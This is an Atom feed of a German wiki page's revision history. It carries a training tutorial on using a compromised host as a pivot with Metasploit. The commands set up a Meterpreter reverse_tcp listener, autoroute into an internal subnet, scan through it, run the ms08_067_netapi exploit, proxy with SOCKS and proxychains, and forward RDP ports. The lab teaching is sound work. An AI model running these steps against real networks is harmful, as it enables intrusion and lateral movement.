<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="de">
	<id>https://wiki.ixheim.de/index.php?action=history&amp;feed=atom&amp;title=Metasploit_als_Pivot_Host</id>
	<title>Metasploit als Pivot Host - Versionsgeschichte</title>
	<link rel="self" type="application/atom+xml" href="https://wiki.ixheim.de/index.php?action=history&amp;feed=atom&amp;title=Metasploit_als_Pivot_Host"/>
	<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_als_Pivot_Host&amp;action=history"/>
	<updated>2026-05-15T03:31:00Z</updated>
	<subtitle>Versionsgeschichte dieser Seite in Xinux Wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_als_Pivot_Host&amp;diff=63242&amp;oldid=prev</id>
		<title>Thomas.will: /* Hinweise */</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_als_Pivot_Host&amp;diff=63242&amp;oldid=prev"/>
		<updated>2025-05-22T09:36:34Z</updated>

		<summary type="html">&lt;p&gt;&lt;span dir=&quot;auto&quot;&gt;&lt;span class=&quot;autocomment&quot;&gt;Hinweise&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;table class=&quot;diff diff-contentalign-left diff-editfont-monospace&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;de&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Nächstältere Version&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Version vom 22. Mai 2025, 09:36 Uhr&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l98&quot; &gt;Zeile 98:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Zeile 98:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;== Hinweise ==&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;== Hinweise ==&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;`&lt;/del&gt;autoroute&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;` &lt;/del&gt;funktioniert nur mit Meterpreter-Sessions&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;*autoroute funktioniert nur mit Meterpreter-Sessions&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* Für effektives Pivoting sollte der Zielhost nicht durch Firewall blockiert sein&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;*Für effektives Pivoting sollte der Zielhost nicht durch Firewall blockiert sein&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* Der &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;`&lt;/del&gt;socks_proxy&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;`&lt;/del&gt;-Modus ist nützlich für Tools wie &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;`&lt;/del&gt;smbclient&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;`&lt;/del&gt;, &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;`&lt;/del&gt;nmap&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;`&lt;/del&gt;, &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;`&lt;/del&gt;proxychains&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;`&lt;/del&gt;, &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;`&lt;/del&gt;firefox&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;`&lt;/del&gt;, etc.&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;*Der socks_proxy-Modus ist nützlich für Tools wie smbclient, nmap, proxychains, firefox, etc.&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* Mehrere Pivot-Sessions sind möglich, aber unübersichtlich – beschränke dich im Training auf eine&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;*Mehrere Pivot-Sessions sind möglich, aber unübersichtlich – beschränke dich im Training auf eine&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;== Siehe auch ==&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;== Siehe auch ==&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;

&lt;!-- diff cache key my_wiki:diff::1.12:old-63241:rev-63242 --&gt;
&lt;/table&gt;</summary>
		<author><name>Thomas.will</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_als_Pivot_Host&amp;diff=63241&amp;oldid=prev</id>
		<title>Thomas.will: Die Seite wurde neu angelegt: „== Ziel == * Zugriff auf interne Systeme im Netz 10.0.10.0/24, die vom Angreifer aus nicht direkt erreichbar sind * Nutzung eines kompromittierten Hosts als Sp…“</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_als_Pivot_Host&amp;diff=63241&amp;oldid=prev"/>
		<updated>2025-05-22T09:34:43Z</updated>

		<summary type="html">&lt;p&gt;Die Seite wurde neu angelegt: „== Ziel == * Zugriff auf interne Systeme im Netz 10.0.10.0/24, die vom Angreifer aus nicht direkt erreichbar sind * Nutzung eines kompromittierten Hosts als Sp…“&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Neue Seite&lt;/b&gt;&lt;/p&gt;&lt;div&gt;== Ziel ==&lt;br /&gt;
* Zugriff auf interne Systeme im Netz 10.0.10.0/24, die vom Angreifer aus nicht direkt erreichbar sind&lt;br /&gt;
* Nutzung eines kompromittierten Hosts als Sprungbrett („Jump Host“)&lt;br /&gt;
* Portweiterleitung, Routing und Exploits über Metasploit&lt;br /&gt;
&lt;br /&gt;
== Voraussetzungen ==&lt;br /&gt;
* Erfolgreicher Exploit mit Meterpreter-Session auf einem System innerhalb von 10.0.10.0/24&lt;br /&gt;
* Metasploit ist aktiv mit laufender Session&lt;br /&gt;
&lt;br /&gt;
== Meterpreter-Session starten ==&lt;br /&gt;
* Exploit nutzen oder manuell Listener starten:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
use exploit/multi/handler&lt;br /&gt;
set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
set LHOST 192.168.56.1&lt;br /&gt;
set LPORT 4444&lt;br /&gt;
run&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Wenn sich das Ziel meldet:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
sessions&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Beispielausgabe:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
[*] Meterpreter session 1 opened&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Interne Netzwerke sichtbar machen ==&lt;br /&gt;
* In der Session:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
sessions -i 1&lt;br /&gt;
ipconfig&lt;br /&gt;
route&lt;br /&gt;
arp&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Notiere interne Subnetze, z. B. 10.0.10.0/24&lt;br /&gt;
&lt;br /&gt;
== Autoroute einrichten für 10.0.10.0/24 ==&lt;br /&gt;
* In der aktiven Meterpreter-Session:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
run autoroute -s 10.0.10.0 -n 255.255.255.0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Anzeige aller Routen:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
run autoroute -p&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Scannen von Zielen über die Session ==&lt;br /&gt;
* Zurück in msfconsole:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
use auxiliary/scanner/portscan/tcp&lt;br /&gt;
set RHOSTS 10.0.10.10&lt;br /&gt;
set PORTS 22,80,445&lt;br /&gt;
run&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Der Scan wird über die autoroute durch die Meterpreter-Session geleitet.&lt;br /&gt;
&lt;br /&gt;
== Exploits durch die Pivot-Route durchführen ==&lt;br /&gt;
* Beispiel:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
use exploit/windows/smb/ms08_067_netapi&lt;br /&gt;
set RHOST 10.0.10.10&lt;br /&gt;
set PAYLOAD windows/meterpreter/reverse_tcp&lt;br /&gt;
set LHOST 192.168.56.1&lt;br /&gt;
set LPORT 4445&lt;br /&gt;
exploit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Optional: SOCKS-Proxy starten für externe Tools ==&lt;br /&gt;
* SOCKS-Proxy aktivieren:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
use auxiliary/server/socks_proxy&lt;br /&gt;
run&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* In /etc/proxychains.conf folgendes ergänzen:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
socks5 127.0.0.1 1080&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Beispiel mit nmap durch die Pivot-Verbindung:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
proxychains nmap -sT -Pn 10.0.10.20&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Portweiterleitung (portfwd) nutzen ==&lt;br /&gt;
* In Meterpreter:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
portfwd add -l 4444 -p 3389 -r 10.0.10.10&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Danach kannst du dich lokal auf RDP 127.0.0.1:4444 verbinden → wird an 10.0.10.10:3389 weitergeleitet&lt;br /&gt;
&lt;br /&gt;
== Hinweise ==&lt;br /&gt;
* `autoroute` funktioniert nur mit Meterpreter-Sessions&lt;br /&gt;
* Für effektives Pivoting sollte der Zielhost nicht durch Firewall blockiert sein&lt;br /&gt;
* Der `socks_proxy`-Modus ist nützlich für Tools wie `smbclient`, `nmap`, `proxychains`, `firefox`, etc.&lt;br /&gt;
* Mehrere Pivot-Sessions sind möglich, aber unübersichtlich – beschränke dich im Training auf eine&lt;br /&gt;
&lt;br /&gt;
== Siehe auch ==&lt;br /&gt;
* [[Metasploit Einführung]]&lt;br /&gt;
* [[nmap durch proxychains nutzen]]&lt;br /&gt;
* [[Pivoting mit Chisel]]&lt;/div&gt;</summary>
		<author><name>Thomas.will</name></author>
	</entry>
</feed>